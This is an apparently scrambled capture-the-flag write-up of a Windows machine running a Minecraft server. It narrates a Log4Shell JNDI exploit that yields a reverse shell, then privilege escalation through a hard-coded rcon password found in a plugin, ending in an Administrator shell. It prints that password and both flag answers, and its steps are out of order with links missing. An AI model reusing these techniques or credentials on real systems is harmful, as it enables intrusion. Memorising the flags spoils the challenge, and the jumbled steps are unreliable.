Crafty (Easy)
Last updated
Was this helpful?
Last updated
Was this helpful?
Difficult -> Easy
OS -> Windows
State -> Retired
Tags -> Web Application / Injections / Common Applications / Remote Code Execution / Hard-coded Credentials / Batch / Java
Then I did an exhaustive scan to learn more about the services running on the open ports
I explored all the site buttons but got redirected to a Coming Soon page with no relevant info. The only interesting thing I found was a domain that with the context of the page should be for the Minecraft server that was running on the machine, as also the previous scan showed me
After that I inserted the payload for the JNDI communication in the client and checked the script where I was notified about getting a request, confirming the petition was sent properly, and also checking the listener, I had caught a shell from the machine
Once inside I went to the Desktop of the user where I found a user.txt file and reading its content I retrieved the user flag
With that, I got the user flag
Answer: 286dda4cbcfb299d664f02c2511a543
To find a way to escalate privileges I started looking at the files under the server's folder. There I found files related to logs and configurations, but what caught my attention was the plugins folder, as they are usually added externally from the base software and are well-known for being vulnerable on various types of applications. Checking the content of this folder there was a playercounter plugin that could be saving some interesting data about users
Finally, I went to the Desktop folder where I found a root.txt file, and reading its content I retrieved the root flag
With that, I got the root flag and pwned the machine
Answer: ccd0681e8e2d4988e392984202922be3
I started doing an initial port scan using
I found an HTTP service on port 80 so I tried accessing the content on the browser. I got redirected to the crafty.htb domain but couldn't get the content. So I added it to my list of known hosts in the /etc/hosts file and visited again this time having access to a page about a server for the popular game
To learn more about the HTTP protocol you can go
As I didn't have the game, I tried finding an alternative way to interact with this server. After much searching, I found a with a console client to interact with the Minecraft servers, which would log some interactions and let me send commands as if I were in the game. I downloaded the on my machine and then executed the client specifying an arbitrary username with no password and the target IP
Now that I could interact with the server, I tried looking for any possible vulnerability related to this game version. After some research, I found an about a previous security warning related to the login library. It was vulnerable to the well-known Log4Shell vulnerability, so I started to find a way to exploit it, and fortunately, to facilitate the process, I found a on GitHub
I downloaded it, checked its structure, and noticed something I had to modify. In line 26 of the script, it was spawning a /bin/sh binary but changed it to powershell.exe as our target was a Windows machine. Then I set a listener with to catch the connection and reviewed the parameters needed, setting my IP to make the petition, an arbitrary port where the web server will be deployed, and the port where the listener was running
To learn more about the Log4Shell vulnerability and its exploitation you can go
After executing it I got several errors related to Java. I didn't understand what was wrong, so I reviewed the repository again and noticed that for this script to work, I would need a proper in the repository. So I did that, with the JDK folder in the same place that the script was, I re-run it this time deploying everything without a problem
I checked the permissions we had on the folder but we didn't have writing permissions so we couldn't export or copy the content of the file. So I went to the root folder and created a Temp folder which will give me this advantage, then copied the file there and used to encode its content to base64 to prepare it for the transfer
Having the encoded content, I copied it to a file on my machine and reverted the encoding process with the base64 command, saving its content again to a .jar file to have again the same file. Then I searched on the web for a and uploaded the file being able to see the source code of the executable
I understood that this plugin was connecting to a rcon service and logging in locally using the s67uB4zKqBIXw password and then doing the counting process. This leaked a possible password for a user under the system, maybe for the Administrator user. So to try logging in or even better to run commands as another user, I could try using the utility. To do so, I downloaded the binary on my machine and exported it to the target
Then I set another listener and tried using the binary to generate a Reverse Shell spawning a PowerShell that would connect to my machine specifying the proper credentials. With that, I successfully gained a shell as the Administrator user
